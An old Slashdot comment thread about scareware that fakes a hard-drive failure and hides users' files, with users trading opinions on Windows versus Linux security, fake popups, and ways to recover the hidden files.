I am curious as to who is this "we" you talk about. Are you a spokeperson for the Slashdot community as a whole, or just a very specific subset, some kind of elite group maybe? Do you have a newsletter I could subscribe to, or maybe a webring or a Facebook page? Do you have a secret handshake that I could use to talk my way out of a ticket or to cut in line at the theater?

> I'm sure there's a .net forum somewhere you can rant on.

Out of curiosity I took a quick look at your recent posts and there is a pattern... Usually you tell people to go post their stuff on Digg, but in my case you made an exception and suggested for some reason to find a .net forum. Which is peculiar, since my post was about hard drives.

Either you are a true Slashdot Vigilante, or you are a shareholder of Digg and various .net forums and you try to bring in more traffic. Tsk tsk.

In any case, I friended you (as neutral, but still). I am looking forward to see more of your posts in the future, and for everybody's convenience maybe you could include a hyperlink to Digg so I would not need a bookmark, I would just need to have a look at your redundant posts.

Re:False alert

[cthulhu11]

RAID only protects against hardware failure
If it's a type that provides redundancy, sure.
and even then only if the failure is actually detected instead of just silently munging data
Repeat after me: Z F S. I had a disk do this on me last week.
However the actual problem was worse: I had a Seagate hard drive.
Seagate drives have been okay for us. We've had a bunch of failures, but those have been out of a whole bunch of disks. The *incidence* for us with Seagate drives hasn't been any better or worse than with Hitachi/IBM or Fuji or Toshiba drives. Now, the Quantum Q105S, now there was a shitty-ass disk.

Re:False alert

[hb79]

Geez, you can know a nerd from his over analyzing narrow vision, and conclusions based on air.

All I ask for, is less Microsoft while reading Slashdot. If please is what it takes, I can even afford that:
Please, post your Windows questions somewhere else, on your favorite forum, I really don't care where.

Re:False alert

[lucm]

> Geez, you can know a nerd from his over analyzing narrow vision, and conclusions based on air.

Says the guy who complains about Windows questions to someone who posted a joke about Seagate hard drives.

> Please, post your Windows questions somewhere else, on your favorite forum, I really don't care where

There was never a Windows question. I suggest you read again my post really slow (maybe with the help of someone), then read you reply, and if it does not dawn on you that it is you that brought Windows, Microsoft and .net in this thread then you should have a serious talk with those voices inside your head because they are misleading you (and if one of them is telling you to hurt people then maybe you should start to worry).

> All I ask for, is less Microsoft while reading Slashdot.

Again, you are the one who brought Microsoft in this thread. This being said, you have no control over what is posted by other people and while you can make all the demands you want, unless you have some kind of leverage like a hijacked plane full of kids and puppies, I suspect you will never obtain satisfaction.

The pursuit of happiness is part of the American dream so you are welcome to keep complaining all the time, but I would say your odds of success will be significantly higher if you don't bring up yourself the subjects you dislike.

First fucking flag for anyone with a clue

[Datamonstar]

Download a fix for a hardware problem. Maybe firmware, but no way that'll be coming through anything other than the manufacturer's channels of communications. Also, it's the OS that makes this possible. Note that nothing at all is actually happening to the files. Shame shame shame again.

Re:First fucking flag for anyone with a clue

How fucking stupid do you have to be to think that this is targeting people who have a clue? Did you think about this at all, or did you just have some desperate desire to come across as an unlikeable Comic Book Guy figure?

Re:First fucking flag for anyone with a clue

[Aeternitas827]

I think the point that's being made is that people need to be a little more educated on shit like this (or, alternately, that people aren't paying attention to or are too dumb to comprehend the reliable information out there).

I think most of us understand that this is meant to prey on those who are a little less wise with their systems. Any good scam targets the idiots, because a successful scam generally depends on the target not seeing that 1 and 1 aren't making 2 any longer.

When web apps...

[3vi1]

When web apps pop up a realistic looking XP or Win7 windows claiming virus infection... or the need to run an 'exe' to install a missing codec, it's a good day to be running Linux or OS X. Nothing tells you fraud so much as something that's been polished to a fine point to fool the Windows users.

Re:When web apps...

[rtaylor]

True, but there is nothing here that couldn't be done just as easily on OSX and Linux.

Remove users files in standard Gnome/KDE places and futz with the .bashrc or .profile file to make the login wonky.

Re:When web apps...

[miknix]

Next step.. Modify the malware to prompt the user to install Linux?

Re:When web apps...

[somersault]

Good reason to change the default theme in Windows too.

Re:When web apps...

[adolf]

While I believe your advice is well-intentioned, it's really no good.

This only works if the malware isn't using existing Windows widgets for its displays.

If I were I Windows programmer (I'm not) and I were writing malware (good heavens!), I'd use the native toolkit for all of my dealings...just like most other software does. It's easier, that way.

And then: Changing themes, for properly-implemented malware, would also change the look of that ill program to match.

Re:When web apps...

[3vi1]

>> True, but there is nothing here that couldn't be done just as easily on OSX and Linux.

And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

People that were conditioned to Windows might fall for it, but people that 'learned' Linux would know it's BS.

How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

VIRUSES IN LINUX DON'T PROPAGATE BECAUSE LINUX DOESN'T WORK LIKE WHAT YOU'RE USED TO.

Re:When web apps...

[pz]

When web apps pop up a realistic looking XP or Win7 windows claiming virus infection... or the need to run an 'exe' to install a missing codec, it's a good day to be running Linux or OS X. Nothing tells you fraud so much as something that's been polished to a fine point to fool the Windows users.

Good reason to not have the default color scheme on your windows box. Makes it easy to spot the fake popups.

Re:When web apps...

[amliebsch]

Most malware, being trojans, cannot create native widgets because they are stuck inside of the browser jail, so they simulate system widgets to fool users into believing they are not already jailed to the browser, and then the user inadvertently lets it out of the jail.

Re:When web apps...

You're not the person the malware is trying to fool.

If you know enough about computers to recognize malware, you probably know enough to remove it.

Gramma? Not so much in either case.

Re:When web apps...

"Viruses" don't propagate in Linux because nobody fucking uses Linux.

Derp it up all you wish, the fact is, Linux has no desktop marketshare that's even worth mentioning. Oh, but you'll be in for a surprise if that ever changes. Protip - Ubuntu's lolroot crap is as effective as anything else at teaching users they should click 'OK' whenever presented with strange dialog.

Now if you'll excuse me, I have to go laugh at all the tools who install $CMSFLAVOROFTHEMONTH into a docroot and then never fucking update it. Linux. Hurr, durr, answer to everything, hurr.

Re:When web apps...

[Pentium100]

How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

There are a lot of people who are used to Windows, so if they switch, especially after hearing that Linux has no viruses/malware they might feel safe clicking on anything.
Also, in my experience not all programs and drivers are in the default repositories, for example, drivers for Canon multifunction devices (the scanner part) are available as a .deb file from canon web site, but not on any Debian Linux repository. Which means that I (or someone else) actually have to sometimes download and run a file to install a program. Opera web browser is also not available in the default Debian repositories, but has its own repository and I have to add it to the list to be able to use Opera. So, I (or someone else) have to do that sometimes too. Sometimes I also may download and run a shell script to do something that I want. I can read and semi-understand a simpler shell script though, I doubt that everyone can.

Any of these could be a way for malware. If a user wants the screensaver with kittens, he will try to install it. Also, "Your computer has problems, download this simple script to fix them". The script then downloads and runs whatever the malware makers want.

How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

"Want this screensaver with the cute kittens? You can download it for free (admin access required to install)"

If you impose behavior limits, like "don't click on ads, don't install random programs, do not run as root, stay updated" then Windows become quite safe too. Sure, there are remote vulnerabilities, but I really doubt that, say, Firefox or Flash on Linux is completely safe (if so, why the Windows versions have bugs?). Running as limited user will limit the malware to just screwing up the user's files which, on a single-user system is almost as bad as screwing up the whole system (if malware deleted all my files, I might as well format and reinstall).

Limiting the user to default repositories would only work if the repositories contained every single non-malware app that is available, otherwise there will be a reason for the user to use alternative means of getting the software and may end up getting malware.

Re:When web apps...

[vlueboy]

Thanks for the Java reminder --I got a this new PC the other day and had meant to ensure the OEM had NOT bundled it. I had a recent Java-initiated spyware on the Vista laptop earlier in the week.

I'd forgotten to dump the Java runtime since I used to play with the SDK. Because enterprise Java has grown ever complex and acronym-ridden, I simply stopped minding it about 2 years ago and forgot to remove its inconvenient attack vector even though I've been hit through it more than once.

On the color schemes, I used to have Teal (aquamarine colors) immediately highlight the one white and gray "standard-colored" window popups as fake. Fake popups also stand out when all you have is MacOS 8 --the problem goes back to more than a decade ago. It's a shame that after Windows 2000, MS has hidden and then removed the fancy pre-named color themes (not Luna or glass, but the CLASSIC ones) and left only the default AND green-on-black ones.

I'm pretty sure they want to establish a non-fragmented look to compete against the pretty iconic MacOS X brushed metal and Gnome's brown desktop motifs.

Re:When web apps...

[adolf]

If that's "most" of them, as you say, then I've never had to cure "most" infections because they never happened to begin with.

TFA is about a program, running on the local computer, which proclaims quite persuasively to be part of Windows. Changing themes will do fuck-all to help folks see the difference.

Re:When web apps...

[Archangel+Michael]

Why is this even allowed (widget impersonation) is beyond me. The reason being, clicking the big X in the upper right should do one thing only, close a window, not install Super Deluxe Antivirus 2011, Doomsday Edition.

And wasn't anti-popup technology supposed to fix this?

Re:When web apps...

[SheeEttin]

Or, seeing the XP-styled attempts on Windows 7... that's nice too.

Re:When web apps...

[amliebsch]

Lol look at this knockers on this girl!

If you can't see the vid, just update your linux codecs by clicking here: http://icanhazmalware.deb/

Re:When web apps...

[amliebsch]

Most infections START that way. Pop up a browser window with fake widgets and a virus scanner, animate the scrollbar and scare the user with a fake virus alert. The user doesn't realize this is just a browser window and everything in it is faked. Then the scared user clicks the "Clean now" button, voluntarily runs the software, and it's game over. NOW the software can do whatever it wants.

Re:When web apps...

[Billly+Gates]

"Remove users files in standard Gnome/KDE places and futz with the .bashrc or .profile file to make the login wonky."

Yeah, I already tried Gnome-shell thanks

Re:When web apps...

[ShoulderOfOrion]

I have to agree, and Linux has been my desktop OS since the mid '90s.

I've had my mom (in her 70's) running Linux for over a decade. Ubuntu for the last 5 years. It's cut down my IT support calls by 90%. But she's not a Linux user, she's a Firefox/Thunderbird user. And she knows how to respond to the upgrade alert, typing in that admin password every time. I dread the day Linux becomes popular enough to start targeting.

Go Windows!

Re:When web apps...

[WuphonsReach]

Why is this even allowed (widget impersonation) is beyond me. The reason being, clicking the big X in the upper right should do one thing only, close a window, not install Super Deluxe Antivirus 2011, Doomsday Edition.

And wasn't anti-popup technology supposed to fix this?

a) Web browsers serve text and images. They do not (yet) monitor what the content of those images look like. It's very easy to create a web page that looks a lot like an operating system warning, you just have to keep it within the borders of the page.

(Which is why some systems dim the entire screen before presenting security dialog prompts. That's something that a fake alert in a web browser can't do.)

b) Anti-popup technology does not yet handle DHTML(?) pop-ups or pop-ups done with CSS tricks. On the plus side, those tricks are constrained to the browser tab where they occur instead of actually popping open additional browser windows of random sizes in front of or behind the existing browser window.

Re:When web apps...

Unless the popup in the browser has access to full-screen mode through, say, Flash. or a crappy HTML5 video implementation. Then it's just a matter of guessing what the user's desktop looks like. This is easier than it sounds, when you have their UA string and assume the browser is maximized... you only have to get close enough that they only notice the big change (dimming), and not the simultaneous little changes (differences between the dimmed and original image).

Re:When web apps...

If you impose behavior limits, like "don't click on ads, don't install random programs, do not run as root, stay updated" then Windows become quite safe too. Sure, there are remote vulnerabilities, but I really doubt that, say, Firefox or Flash on Linux is completely safe (if so, why the Windows versions have bugs?). Running as limited user will limit the malware to just screwing up the user's files which, on a single-user system is almost as bad as screwing up the whole system (if malware deleted all my files, I might as well format and reinstall).

Bullshit. Backups (real ones, that live someplace outside your computer) are essential, of course, but it's trivial to setup a cron job making a pseudo-backup of your important documents, up to and including your entire home directory if you wish, to the free space inside your machine. If you exclude any downloaded videos and music, 1TB will last most people well over a year without automatic cleaning of old files (which I advise against -- too easy to make silly mistakes that will clean your whole pseudobackup drive once a year, too much work to do the requisite testing to prove you didn't make one.) (If you haven't got a TB free, it starts about $50 these days, and any old drive is fine for this -- light usage, no performance requirements, and you're not depending on it for backup-level reliability.)

You can have this pseudobackup read-only accessible or even completely inaccessible (for better privacy of deliberately deleted files) to your account under ordinary circumstances, but when malware fucks your home directory without compromising root, you just create a new user account, copy the relevant stuff into it, and you're straight back in business, insanely faster than a full reinstall and restoration from offline (i.e. real) backups. Good for those damn-i-feel-like-a-noob moments when you accidentally delete the wrong file, too.

And that applies to Windows as well as Linux, of course -- a bit harder to setup IMO, though that may be a matter of my background, but perfectly doable. And why the hell wouldn't you?

Re:When web apps...

[Black+Parrot]

Actually, the summary reads like an April Fool's joke about Windows95.

Re:When web apps...

[christian.ost]

And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

Some distributions have become better at it recently but it used to be the norm that after setting up a desktop linux box you would have to add at least 1-3 3rd party repositories to get non-free software (graphics drivers, adobe stuff, ...) and software of dubious legality (DVD playback, msfonts, media codecs, ...).

I also remember very well having to install some early OOo versions into /opt via a standalone binary installer because the distribution I used at the time didn't include it at all.

So to answer your question - I wold tell the user that he is missing media codecs for some obscure video format and ask him to add the repository containing my "fake" codec packages to his package manager. That way I can make sure he always is running the latest version of my malware.

There are also linux-based software distribution systems that bypass a distro's package manager - klik, Zero Install, Autopackage, RUNZ, ...

Re:When web apps...

but when malware fucks your home directory without compromising root, you just create a new user account, copy the relevant stuff into it, and you're straight back in business,

How would you be sure that hasn't happened? The malware could have used privilege escalation exploits.

Re:When web apps...

[snemarch]

And tell us how you would do that? How would you make a web page that convinces the user that they should click 'okay' on your installer instead of going to the system app center / repositories?

People that were conditioned to Windows might fall for it, but people that 'learned' Linux would know it's BS.

And that's only true because there's such a small percentage of people that use Linux, and they generally aren't Clueless Joe User types.

How would you convince someone to give you the admin ID when they didn't launch an installer or app that needs admin access?

Linux never had local privilege exploits, nah-uh.

VIRUSES IN LINUX DON'T PROPAGATE BECAUSE LINUX DOESN'T WORK LIKE WHAT YOU'RE USED TO.

THERE ISN'T A LOT OF MALWARE FOR LINXU BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

Re:When web apps...

[snemarch]

Good scheme, but do you expect Joe Burgerflipper and Grand Ma to do such a setup? They're the ones that usually get hit by malware.

Re:When web apps...

[somersault]

If you change XP to the silver theme, and the browser pops up a blue warning box, you know it's not real. I know people who would fall for a fake message no matter what it looks like, but little details like that would help intermediate users.

I especially hate downloading stuff from free hosting sites like rapidshare or CNET, because without an adblocker installed, they have about 6 "download" buttons simetimes, 5 of which will be ads.

Re:When web apps...

This high definition codec is new and not yet available from the default repositories. Add the following repository and install the package "weownu" to see huge tits in high definition 3D!

Re:When web apps...

[h4rr4r]

THERE ISN'T A LOT OF MALWARE FOR LINXU BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

Ask for a tour of your nearest datacenter.

Your idiotic caps made me write this sentence calling you an idiot to get the lameness filter to shutup.

Re:When web apps...

[snemarch]

THERE ISN'T A LOT OF MALWARE FOR LINXU BECAUSE LINUX ISN'T SIGNIFICANT MARKET-SHARE WISE. There, ftfy.

Ask for a tour of your nearest datacenter.

You don't target datacenters with consumer-oriented malware. You target them with DDoSes or specialized attacks to get specific information you're interested in, often involving exploit that aren't known by the public. It's a whole different ballpark.

Your idiotic caps made me write this sentence calling you an idiot to get the lameness filter to shutup.

Idiotic caps because the parent had idiotic caps.

Re:When web apps...

[3vi1]

>> "Viruses" don't propagate in Linux because nobody fucking uses Linux.

Right. All web servers run IIS. Right. No one wants to hack web servers. Right.

People that claim Linux isn't targeted because it has no market share have no clue. I'll bet you use Linux every day, whether you know it or not.

TLD4 Variant?

[terbo]

I think this is a TLD4 variant, I've had to remove it several times
over the past several months, pretty persistent but the usual.

Re:TLD4 Variant?

[Mashiki]

That one, and the new TSS variants floating around are...painful. Nuking the machine from orbit and restoring from a clean backup is almost easier than removing them. The last machine I cleaned from one of the new TSS variants took nearly 5 hours. The infection point was some bloody facebook page.

The stupid it burns sometimes.

Re:TLD4 Variant?

[pspahn]

Oblig. Friendface

Re:TLD4 Variant?

[kvvbassboy]

It's been a long time since there was malware in my computer. How exactly do these things get inside, in the first place?

Once they get installed into a computer, do they spread throughout the local network?

Re:TLD4 Variant?

This particular one? Either a browser exploit distributed as a banner ad, letting it run automatically in IE8 if you visited rlslog.net (or anyone else using the same ad network) about a week ago, or plain stupid user-clicks-on-everything in less borken browsers. If you actual get the malware, and then pretend to be a semi-trained money and click "Yes, please install this obviously fake software fix for the hardware problem you're giving me obviously fake warnings about, follow through with your credit card, and let it sit on your machine, I have no clue if it has the ability to spread over the network, but it seems unlikely

I saw this today

[CmdrPorno]

It certainly takes it a step further than "your system is infected." Ironically, the system actually does appear to have a bad hard drive (bad blocks marked by CHKDSK). Customer had paid someone else to replace the hard disk a little over a month ago and showed me the receipt, but the hard disk in the machine was the same capacity as the OEM disk and had a date code indicating that it was likely not a new drive, but the one that was factory installed.

They're just going to replace the machine since the "infected" one has Vista and, for that reason, will run badly even after it's fixed properly (and honestly). The linked article provides a location where the malware hides the user data.

Been around a bit

[zvar]

Umm... This has been around for a few months.

Bad news day, I'm guessing

[knotprawn]

There are quite a few windows bugs out there. This one makes changes to the registry and moves files and folders around. Most of the other bugs do that anyway. I didn't read the whole article, of course, but it seems like this isn't really all that news-worthy. The only difference that I can see is that it moves more stuff around than the other bugs. Or perhaps there was a point and I missed it.

Re:Bad news day, I'm guessing

[somersault]

In our world, that word doesn't mean what you think it means. You should say "malware" and not "bugs". Bugs are mistakes in the design or creation or a computer program.

Malware can finds its way into your system via bugs, but viruses and other types of malware are not bugs.

Re:Bad news day, I'm guessing

[knotprawn]

sorry, about that, point accepted. Given that everyone's a doctor at home and given the interchangeable usage of the terms viruses and bugs (biologically speaking of course), I extrapolated the interchangeability to the computer domain. Unintentional, purely.

Chimera, Bellerophon

Reminds me of the plot of Mission:Impossible 2.

How could one differentiate ...

[PPH]

... between this malware and normal Windows behavior?

Re:How could one differentiate ...

[Mashiki]

Well normal windows behavior means that under a LUA, you can't do squat. I mean, you are using LUA's right? So, how often do you see hive collapses? I can count them on one hand, over the last 10 years. However malware behaving like this has been off-on again for the last 5ish years.

Re:How could one differentiate ...

Well normal windows behavior means that under a LUA, you can't do squat. I mean, you are using LUA's right? So, how often do you see hive collapses? I can count them on one hand, over the last 10 years. However malware behaving like this has been off-on again for the last 5ish years.

Malware that steals passwords, credit card info, ... does generally not need any privileged access to run. Rooting the box is really secondary when you can get all info you want by running from a unprivileged account (e.g. a malicious browser plugin that harvests credit card info from web forms and is installed by the unknowing user somewhere in .mozilla?).

We had this one.

Unfortunately there are recurrent strains: it attacked our Windows XP, which became slower and slower and errors start to show up.

We solved by buying Vista; this one, too, became heavy to a point the machine barely worked.

We solved again by acquiring Windows 7, a very simplified and clean desktop. Very nice. This must be that Zen "less-is-more" thing: less things on screen and more money goes away...

Today I noticed gvim had some trouble starting a macro (but when it works, after some 20 seconds, it's fast as usual).

Do you think we could pay in advance to M$ to help them accelerate Windows 8 release? Didn't they have a software insurance program?

happened last week

This happened to a computer I worked on last week. The malware set the hidden attribute to all the Start menu icons, and also the My Documents files, so it looked like everything was lost. There might have been a couple of other changes, but I can't remember. Didn't take me 5 minutes to fix it all, and Malware Bytes removed the hoax program for me.
  I can see how it would mess with other users and give some people a scare. Old trick, but it worked.

Am I the only one...

That would just buy a new hard drive?

4 instances of attrib running

I've had a few users get one recently that, upon opening taskmgr (thank goodness for LANDesk) had 4 instances of attrib.exe running. Ends up setting every file on the drive to Hidden, System and Read-Only. A PITA to fix remotely. I wish I could get our security guys to add Adobe & Java updates to the critical security patch list.

My end users say it was coming from MSNBC.com

[gunkthruster]

...my day was spent removing this bastard from our work machines. Good day to be a help desk lackey.

Re:My end users say it was coming from MSNBC.com

[Mashiki]

And sites complain when people block ads. This is of course why anyone with a brain blocks ads.

Re:My end users say it was coming from MSNBC.com

[Archangel+Michael]

If Malware is coming from Ads on websites, the someone ought to so the websites for the infections they are causing. Maybe if we hold the intermediaries accountable for the crap people are seeing while visiting their sites then we can slow it down.

Ah

[jav1231]

Windows...move along.

bitcoin

After their creditcard access is limited, they might turn to bitcoins, hope they don't, then someone will look for a way to shut down btc access.
bit.ly/btcbonus for a few free coins
I'm not anon I forgot my pw and I'm locked out of last pass while on my phone -opticbit

Just ran into this yesterday and

[Mithrilhall]

it seemed pretty easy to clean. We ran cmd to launch taskmgr.exe as the local administrator. Then we were able to kill the processes. Once that was done, Malwarebytes took care of the infected files. After that was done we had to use a System Restore point from a few days before the infection.

Re:Just ran into this yesterday and

[FlyingGuy]

Wouldn't a simpler way be, every time IT touches a machine is to get a backup of the registry ( a clean one ) or better yet simply have a default registry on hand. Pop the install CD, go into repair mode and restore the registry to your company defaults.

Another way would be to perhaps take the infected registry and then compare it to the infected registry and you will find every trace of the damn thing, yes?

Re:Just ran into this yesterday and

[amliebsch]

That's what system restore does, it backs up the registry hives.

oh! i Love looking at website that infect windows

[geekthecat]

add links so all of us with GNU/linux can check it out, Please.

Ugh

[ModernGeek]

I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

I know that the stupid XP Antivirus even sets a key in the registry that marks .EXE files as "safe file"

I assume that means that IE will then open and execute any .EXE that heads it's way.

It seems that removing these infections involves the tedious process of booting the hard drive from another machine, and manually picking it all clean.

Only then, does the registry have to be picked through with a fine tooth comb to keep more infections from arising.

I've seen some where Windows Explorer is set as being the actual virus, so that when an AV program deletes it, one cannot log in.

I know that Windows is horrible, and it is not used within my enterprise, but how is it that these infections are able to even exist? Where do they come from?

Re:Ugh

[atlasdropperofworlds]

Actually, the OP has linked to something that is being discussed on a blog at symantec, but it's not claimed to be new.

A user actually has to download and execute the trojan. It doesn't exploit the system. In this case, as is often the case these days, the problem is between the keyboard and chair.

Re:Ugh

I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

I know that the stupid XP Antivirus even sets a key in the registry that marks .EXE files as "safe file"

Because malware must be first identified then the signature added to a data base. Trouble is if the jerks that write the crap do a simple mod then the malware is off the radar. So you have a situation created by jack asses creating binaries that can spread to users and because the binary is closed it can only be moded by the creator. So we have huge companies taking advantage of the fact that Windows closed binary malware needs to be reversed and catalogued before it can be effectively dealt with. The whole antivirus and spyware crap could very easily be dealt with if no software were alowed to be destributed without the source code. Copyright the source for closed source copyleft for opensource. Insist that source code is available before installing anything on Windows or any operating system.
That way anybody that steals your specific source can be taken to task under copyright law. Get rid of the stupid idea that software can be patented!

This is why I only run software that has available code. There are some exceptions like flash and acrobat reader and yes they can cause trouble. But how do you get an infection from flash on Linux? Show me one case of this occuring! Otherwise all these Windows fan boys please just STFU about the insecurity of Adobe flash and acroread and how Linux would be just as bad as Windows if the market share was reversed.

Re:Ugh

[NJRoadfan]

Malwarebytes has been picking up the changed registry keys on recent definitions updates. The major AV packages from Symantec and McAfee aren't effective against any of the most common malware attacks. Its quite sad to read their support forums where people conplain they paid big $$$ for an endpoint protection client site license from the big vendors and the malware still goes undetected. One GOOD thing is 64-bit versions of Windows are immune from most of the nasty stuff for the time being (32-bit dlls can't inject themselves into the 64-bit versions of Explorer or Winlogon).

Re:Ugh

[Billly+Gates]

Most do if they have active protection.

A few years ago Xp antivirus was also called Antivirus 2009 which clones Norton Antivirs 2009 exactly in order to confuse the users. Many users with trail anti virus software thought they were protected so no warning or prevention happened at all.

Those that knew they had unactivated copies of Norton Antivirus 2009 googled Antivirus 2009 and found what looked just like it and installed it that way. Very sleezyl. XP Antivirus did not work as popularly but was the same program under a different name.

I wonder if trailware anti virus software even stops users from running these programs today? ... for removing it, the best instructions I know are simply to use a restore CD and wipe it. You can't get rid of it. Even if you use your hidden partition to restore your machine it will hide itself in a hidden part of the disk partition table and reinstall itself. Using the actual CD if you are lucky enough the OEM did is the only way to wipe this nasty program. Very sleezy indeed.

Re:Ugh

[WuphonsReach]

I'm so confused. Why do the antivirus / anti-malware packages out there not detect and delete these stupid things?

Because anti-virus and anti-malware tools are reactive.

There will always be a lead time between when the malware hits the wild and when anti-virus and anti-malware vendors update their signature databases. That time period can range from hours to months.

(Yet another reason to browse in a way that only whitelisted sites are allowed to do fancy things. It may be a PITA, but it drives down the risk of infection by a few orders of magnitude.)

Re:Ugh

[snemarch]

There are some exceptions like flash and acrobat reader and yes they can cause trouble. But how do you get an infection from flash on Linux? Show me one case of this occuring! Otherwise all these Windows fan boys please just STFU about the insecurity of Adobe flash and acroread and how Linux would be just as bad as Windows if the market share was reversed.

I'll show you as soon as Linux has enough marketshare that people start writing malware for it :-)

The attack vectors are there - Flash, Acrobat Reader, Java, FireFox. If a piece of malware wanted root, there's been enough local privilege exploits around and there's bound to be more.

You and I both keep our Linux systems up to date, don't click spurious links or enter or user credentials where we shouldn't. I expect that goes for most Linux users as the userbase looks right now. But do you expect that situation to stay constant if there was going to be a mass migration towards Linux?

Legal action?

[morikahnx]

If the company in question is linked to the trojan, can we take legal action taken against them? It looks like an open and shut case.

Re:woderful blog

[morikahnx]

Crap, my post is right above this spam.

Ridiculously stupid

[Arancaytar]

There was a virus a while back that used an extortion scheme that was similar: Encrypt the data, wipe the original, then outright sell the key. That one's kind of scary. A simple disinfection wouldn't undo the damage, and since it wouldn't depend on permanent infection it might affect any platform. This one is less upfront about it, but won't fool anyone who has any clue about computers or hard drives.

On the other hand, maybe a lot of users are too clueless to be affected. "Help, there are all these error messages and files keep disappearing, do I have a virus?" "Yes, yes you do."

Umm...

[iMouse]

Again, Slashdot is late to the party. This has been going on for the last month.

The malware is performing an attrib +h on all files in C:\. If you attrib -h on the whole drive, the data reappears. Magic.

What's the fix for this?

I have this on a desktop I seldom use - but that box does have some material I'd like to save
What's the fix?

Administrator?

Operating systems are still running user applications as an administrative user? I sign into my systems as a regular user, and I execute applications as a regular user. Administrative privileges should be for approved installation and removal of applications. On the other hand, It's silly to think that in this day and age, malicious behavior isn't automatically detected by the operating system and squashed - and I don't mean by an anti-virus or anti-malware application that one needs to purchase. Operating systems should have security built-in, not tacked-on later.

Re:Administrator?

[amliebsch]

No, but you don't need administrative privileges to set the hidden flag on the user's own files.

Administrative Access?

[theamarand]

Operating systems are still running user applications as an administrative user? I sign into my systems as a regular user, and I execute applications as a regular user. Administrative privileges should be for approved installation and removal of applications. On the other hand, It's silly to think that in this day and age, malicious behavior isn't automatically detected by the operating system and squashed - and I don't mean by an anti-virus or anti-malware application that one needs to purchase. Operating systems should have security built-in, not tacked-on later.

Re:Administrative Access?

[snemarch]

Operating systems should have security built-in, not tacked-on later.

...anti-competitive lawsuit.

How the fuck!

[FlyingGuy]

How can this still be happening!

I run FF 4.x on a OpenSuse 11.x box and on a windows XP box. I have actually experimented, both FF installs are default. On the Linux box the same stupid screen comes up, "scanning your hard drive you have 99 million viruses clock OK to get rid of them.".

FF on the Linux box you click ok and FF prompts you that such and such a site wants to do some shit with some executable file, tell it no, close the tab and you are ok.

FF on the XP box you click ok and you are off to the races trying to get the crap-ware off of your computer!

Now can some please explain just why the fuck that is?

Can someone explain why the ability for for Drive By's can happen AT ALL an how come the code that allows this sort of shit to happen has not been ripped out with extreme prejudice after the very first occurrence of this behavior?

Perhaps there is a browser author in the mighty /. world who will step up and explain this?

Re:How the fuck!

[WuphonsReach]

Can someone explain why the ability for for Drive By's can happen AT ALL an how come the code that allows this sort of shit to happen has not been ripped out with extreme prejudice after the very first occurrence of this behavior?

Because you're letting random websites run code (Javascript, Flash, PDF, Java) on your computer. And even though that code is sandboxed (by Flash or Java or JavaScript or Adobe PDF Reader) there are flaws in those sandboxes that allow for arbitrary execution of code. Which then lets the little nasty critter out of the sandbox and into your user profile where it can dig in and make itself comfortable.

Re:How the fuck!

[snemarch]

Click yes" is a PEBKAC problem - not much we can do about those.

Drive-by attacks are generally against Flash, Acrobat Reader, Java and there's not much the browser or OS can do against those. There's lots of harm you can do even as an unprivileged user, and if that's not enough there's local privilege escalation exploits on all the major OSes.

What a scam!

[CrazyJim1]

If your hardrive is failing, software won't fix it. This could be as funny as creating a virus to say your computer's flux capacitor is overheating and you'll need to buy a replacement through exmechanicgoneonlinescammer.com

Re:What a scam!

If your hardrive is failing, software won't fix it. This could be as funny as creating a virus to say your computer's flux capacitor is overheating and you'll need to buy a replacement through exmechanicgoneonlinescammer.com

Your har drive? Agreed, if your laughing impulse is impaired, software won't fix it. (Also, har.)

Re:What a scam!

[snemarch]

If your hardrive is failing, software won't fix it.

WRONG! There's SpinRite - it zomgmagic fixes harddrives, several thousand circle-jerking lemmings can't be wrong!

Re:What a scam!

I know that. You know that. But try explaining that to someone who doesn't know or care what the differences between hardware and software are.

Re:What a scam!

Amazingly enough, some of the false errors it displays say as much. One of them says something like "Memory failure emminent. Urgently run memory defrgmenter to resolve bad memory block 0x02b"

gad_zucki: I raise your "oh really" with an oh absolutely. IE9 is not being widely deployed in the corporate envirnoment, and for a few good reasons. One of which is, though it is definintely more secure, it is a piece of crap browser with plenty of compatibility issues.

at least partially truthful sarcasm

What are you talking about? We're living in the future now; these are things of the past. My information and personal identity are safe and secure on the internet. I even reset my PSN password because I knew my birthdate.

Malwares so retro

Viruses, worms, malwares, and evilwares are so retro. Install linux and forget about it.

Been There Done That

[Tablizer]

I had that virus about 3 months ago. Wallpaper black, missing icons, drive failure message, which lead to fix-it purchase site. The computer was 8 years old so I gave up on it and got a new one. Maybe I'll turn it into an Ubuntu box for the kids.

It was my fault for turning off Windows Update because our connection is spotty here and the updates made it crawl.

won't work in XP

I just re-installed Windows XP (again), and the installer informed me that XP is the most secure Windows operating system, so I doubt XP will be affected by this.

How to fix the damage

[smylingsam]

First, DO NOT delete your temp files. There is a varient that not only hides various files (by setting the hidden attribute) but moves the shortcuts to %temp%\smtmp (a hidden directory) . It also reorders the icons.

see:

http://www.emagined.com/security-threat/trojan-fakefrag
http://www.symantec.com/security_response/writeup.jsp?docid=2011-050610-4459-99&tabid=2

An End User at work got this...

[jflo]

I work for a rather large Automotive Supplier, and a guy in our racing division got this thing last week. I ended up pulling his hard drive and connecting it as a secondary on my laptop... I found that I had to change folder options to show hidden files, from there I was able to copy all of his files. Once copied to my hard drive, I had to 'un-hide' everything. I formatted his old drive, reimaged, copied everything back over and was good to. Problem here, its almost impossible to fix this remotely, so I had to have the end user over night his laptop from NC to MI, and then vice versa. 4 day process. Fun time. F*** YOU to whoever wrote this thing.

A Justice Hole

Something I've never really understood with these guys is how they manage to hang around. The malware people are the same folks as the "repair" people, looking to sell software to fix their problems, yes? So why can't we follow the money and have these people arrested or killed if they resist?

Crossing a border won't protect those people if they can be identified.

Hidden not moved to temp location

[malignant_minded]

